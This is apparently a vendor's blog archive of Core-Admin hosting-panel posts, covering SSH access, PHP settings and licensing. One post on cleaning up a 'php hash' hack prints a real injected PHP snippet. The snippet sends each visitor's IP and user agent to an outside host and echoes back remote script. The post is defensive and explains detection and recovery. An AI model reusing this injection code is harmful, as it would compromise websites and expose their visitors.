Blog

Archive for Core-Admin Web Edition

How to activate ssh access for a hosting with Core-Admin

[extoc]

Introduction to activate ssh access for a hosting with Core-Admin

By default, all hostings created with Core-Admin will have an individual user to ensure each hosting runs with isolated permissions.
This hosting user has no way to access through ssh, even it if opened ssh port and a password is configured.

This article, explain how to enable or disable ssh access for a given hosting using Core-Admin.

Prerequisites

Be sure you have a firewall controlling SSH port (usually 22/tcp) to avoid leaving it open for everyone. It should be limited.
If you don’t have a firewall installed, use #Firewall manager. See the following manual to know how to configure it.

How to activate ssh access to a hosting for Core-Admin

Use the following steps. You will need Administrator rights to complete these steps.
First, open #WebHostingManagement application like this:

Selección_347

Then, open available option to manage SSH access:

Selección_348

After that, select the right hosting to configure and if you want to enable or disable SSH access like this:

Selección_349

Once the process is completed, the system will present you a set of configuration notes ready to use:

Selección_350

How to disable SSH access for particular hosting with Core-Admin

In the case you want to disable SSH access, just follow same steps as described before but selecting “disable” inside “Ssh access”.

How to list hostings with SSH access with Core-Admin

Use available option located at the top level tree:

Selección_351

Posted in: #WebhostingManagement, Administration, Core-Admin, Core-Admin Web Edition, SSH, Web hosting

Leave a Comment (0) →

KB 22092016-001 : Fixing error message: The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Sympton

If you get the following error when accesing to a website created by Core-Admin panel, or something similar:

The requested URL /cgi-bin/php-fastcgi-wrapper/index.php was not found on this server.

Then, it is possible that you created a website with custom option that has imported php-engine setting from other or site.com/bin directory was lost.

Affected releases

All releases may suffer this problem. It’s not a bug but a wrong custom configuration.

Background

The problem is caused because, somehow, core-admin was not able to create all PHP structures needed to run this site with a different php engine.

Solution

To solve this, follow these general steps:

  1. Disable custom configuration and let core-admin control site.conf apache2 configuration. For that go to WebHosting management tool, then click on custom site configs, find there site affected, copy into a temporal document your custom settings (to restore them later) and disable custom configuration.
  2. After that, select the right php engine you want under “PHP engines” section.
  3. Then, enable again custom site configuration (if needed) and restore your custom settings.

Posted in: Apache2, Core-Admin Web Edition, PHP

Leave a Comment (0) →

Managing max POST size for a given web site — php post_max_size — php upload_max_filesize

Configuring max POST size  (post_max_size and upload_max_filesize)

Core-Admin starting from revision 5110, supports configuring easily the max POST size you can do to a given web size, known also as php settings “post_max_size” and el “upload_max_filesize”.

For that, get inside your Core-Admin panel as admin user, select a particular web site you want to update, and then click to “Site options”

Core-Admin Webhosting management site option view

If the option is not configured, it will be shown as “not configured”. Now, you only have to select it by clicking over it, then setup the required value (in megabytes MB) and then click on “Edit option”. With that you are done.

Posted in: Apache2, Core-Admin, Core-Admin Web Edition, PHP

Leave a Comment (0) →

PHP 7.0 support for Core-Admin Web Edition

PHP releaseStarting from release 1.0.46 (revision 4644), now Core-Admin supports PHP 7.0 engines for your webhosting applications, configurable at domain level (so the rest of your hosting domains can run with different PHP engines). This new engine allows to support latest PHP release, along with previous releases, including deprecated ones for legacy applications (5.6, 5.4, 5.3, 5.2).

Check out our Core-Admin Web Edition to see how it works: http://www.core-admin.com/portal/get-it/web-edition

Posted in: Core-Admin Web Edition, PHP, Web hosting

Leave a Comment (0) →

Configuring default web site to show when accessing with unknown addresses

In the case you want to show a default web page with a customized “unknown webpage” when accesing to your server with an unknown web page that is not supported or maybe it is supported by in a different address (like accessing with https:// on a web page that is only supported on http://), then, you can do it by following next steps:

1. First, access to the Webhosting management and click on “Options”, then click on “Configure server”:

options-configure

2. After that, click on “Configure default site” and inside, setup the content and save it:

place-content-and-save

Posted in: Core-Admin, Core-Admin Web Edition, Web hosting

Leave a Comment (0) →

Using Core-Admin to resolve php+# web hacking

After a revision you find out that several web pages have been updated with code like follow or maybe a customer whose web is being blocked by the web browser is calling you because it is including suspicous code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not pose any harm to the server if it is properly configured, but makes affected webpages to execute remote chatting code o ads that will make google chrome and many other browsers to block those pages because running that suspicious code.

Understanding these attacks

The problem about these attacks is that they update original files by including a “chirurgical” modifications making it difficult and annoying to get back to original state.

One option is to have a backup, but with the newer webs which use different shorts of caches and php-to-string files, makes it hard to recover. It is not possible to just recover those files by just replacing. You must get back to a consistent state (for example the last backup). This implies removing current web files and recover from backup files (so backup files don’t get mixed with current files that weren’t including at the backup).

After this, you must remember resetting/blocking all FTP accounts/password that were used during the attack.

First line of defense: know when happens the attack

Core-Admin provides you these knoledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like follows:

Core-Admin: detecting php hash attack

After receiving this notification, you only have to run the following comand to find out the amount of files that were modified and the amount of FTP accounts that were compromised. The same command will help you through out the process of recovering infected files and updating ftp accounts’ password.

>> crad-find-and-fix-phphash-attack.pyc

After running above command, which only reports, you can now execute the same command with the following options to fix found files and to update FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

How did this attack happen?

This attack is connected with a network of servers that are in charge of applying these modifications along with a virus/malware software that infects machines that use known FTP clients. Here is how the attack develops:

  1. By using known FTP clients that save passwords at known places at the file system, the first part of the attack is established..
  2. It is suspected that using public Wifis and insecure networks while creating FTP session may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software that extracts stored FTP accounts by sending it to the servers that will perform the FTP attack.
  4. With this information, modification servers (that’s how we call them) that finally attack by using those FTP accounts, downloading original files, updating them and then uploading them back to its original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack just after receiving compromised FTP passwords. They will wait to have several passwords to the same system and also they will delay the attack to disconnect both incidents (the web hack and the infection at your computers).

This way, they hope unaware users to not connect both incidents which otherwise will trigger a anti-virus scan by the user to stop information leaking.

In the other hand, they also wait to have several accounts to carry out a massive attack looking for confusion and/or magnitude to increase likehood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try to not save FTP accounts in your FTP client. Try to save them into an application that stores those passwords protected by a password..
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If it is possible, after doing FTP modifications, enable read-only mode or disable the FTP account using Core-Admin panel. This way, even though the password is compromised, no modification will be possible..

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security

Leave a Comment (0) →

Core-Admin Web Edition: what is included in the license?

A single Core-Admin Web Edition subscription license includes the following general items which are at the same time the elements that are allowed:

  • Support for running a central server and the web interface (turbulence and core-admin central server)
  • Support to accept one agent connecting to this server. More agents can be added by acquiring more Core-Admin Single Agent or similar subscription licenses (see options).
  • Support to create any kind of core-admin users and delegating permissions to them.  This is crucial for any situation where users must have low level permissions to administrate only those objects that they need.
  • Support to run any number of the Core-Admin base applications on any connected server.
  • Support to run one instance of Webhosting management, Mail Admin, Dns Admin and Shared FTP manager.
  • Support to get updates (security, critical and upgrades) at any time, without any limit.
  • Support to create any number of objects without any limit (mail plans, webhosting, etc..).

There are other elements that are allowed by this subscription license but these are the most relevant. Contact us if you have any additional question.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →

Core-Admin Free Web Edition: what is allowed commercially with this license?

You can use Core-Admin Free Web Edition subscription license for any commercial or private use, even for selling hosting services using Core-Admin. The only difference is that it limits the number of objects (web hostings, mail plans) and it also places some restrictions about the kind of core-admin users can can create (to name some).

To see more details about differences between Core-Admin Web Edition and its Free Edition, see the following page: http://www.core-admin.com/portal/get-it/web-edition

In the case you have a private or corporate server and you want to manage your organization’s web pages with Core-Admin, and without considering the purpose of those web pages, then you can use Core-Admin Free Web Edition.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →

Core-Admin Web Edition: what license subscription do I need for several servers?

It depends on the kind of setup you want to install. First you have to cover the base installation to have a Core-Admin central server where to join agents. Let’s see this first:

  • Independent servers: if you want to separate those servers making them to have independent administrations panels, you need one Core-Admin Web Edition subscription license for each server.
  • One panel, various servers: in the case you want to have a single panel controlling these servers, you need a single Core-Admin Web Edition subscription and one Core-Admin Single Agent subscription for each server you want to connect.

Now, you have to consider applications you want to run on those servers that are joined to the Core-Admin server:

  • In the case you want to have separate services in each server, for example, one server runs web services, other mail services and other dns services, you don’t need anything else because Core-Admin Web Edition includes support to run a single instance of all of those applications.
  • In the case you want additional applications you need to acquire a Core-Admin Standard Application subscription and indicate during the purchase process which application you need.
  • In the case you want all servers connected to a single central server but you still need to run all applications (dns, mail, web…) in all of them, it is cheaper to acquire one Core-Admin Web Edition subscription license for each of those servers instead of acquiring separate application.

Posted in: Core-Admin Web Edition, Licensing

Leave a Comment (0) →